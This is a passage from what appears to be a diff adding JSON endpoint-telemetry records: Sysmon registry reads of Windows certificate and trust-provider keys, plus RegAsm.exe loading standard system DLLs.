"registry_value": "Certificates", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863560016, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570863560016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "AcLayers.dll", + "image_path": "C:\\Windows\\SysWOW64\\AcLayers.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570862150000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\SysWOW64\\win32u.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570862300000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", 
+ "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863710000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570863710000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570863869984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\SysWOW64\\rpcrt4.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864030000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\SysWOW64\\sspicli.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864030000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "cryptbase.dll", + "image_path": "C:\\Windows\\SysWOW64\\cryptbase.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864030000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\SysWOW64\\bcryptprimitives.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": 
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864030000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\SysWOW64\\sechost.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864030000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\SysWOW64\\combase.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864030000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\SysWOW64\\advapi32.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864490000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\SysWOW64\\shlwapi.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864490000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\SysWOW64\\kernel.appcore.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864490000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": 
"C:\\Windows\\SysWOW64\\oleaut32.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570864650000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "shell32.dll", + "image_path": "C:\\Windows\\SysWOW64\\shell32.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570863869984, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\SysWOW64\\imm32.dll", + "pid": 5012, + "process_name": "RegAsm.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 
131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570865280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570865280000, 
